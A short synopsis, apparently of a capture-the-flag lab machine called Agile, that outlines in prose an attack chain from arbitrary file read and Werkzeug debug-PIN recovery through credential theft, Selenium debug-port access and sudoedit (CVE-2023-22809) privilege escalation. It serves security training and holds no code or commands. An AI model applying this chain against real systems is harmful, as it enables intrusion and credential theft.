Certified Defensive Security Analyst by Academy. Get started now!
Agile is a medium difficulty Linux box that features a password management website on port 80. Upon creating an account and adding a couple of passwords, the export to CSV functionality of the website is found to be vulnerable to Arbitrary File Read. Enumeration of the other endpoints shows that `/download` throws an error when accessed and brings up the `Werkzeug` debug console. This console is protected via a PIN, however a combination of this console with the ability to read files through the previously mentioned vulnerability allows users to reverse engineer this PIN and execute system commands as `www-data`. Database credentials can then be identified in order to connect to the password manager website's SQL database, which holds credentials for the `corum` user on the system. A second version of the website is found to be running and an automated system performs tests on it through the `Selenium` web driver. The debug port for `Selenium` is open and through SSH tunnelling, attackers can access the test environment of the website and acquire credentials for user `edwards`. Finally, a combination of `CVE-2023-22809`, a custom entry in the global `bashrc` file, and incorrect permissions on a Python virtual environment activation script, lead to privilege escalation.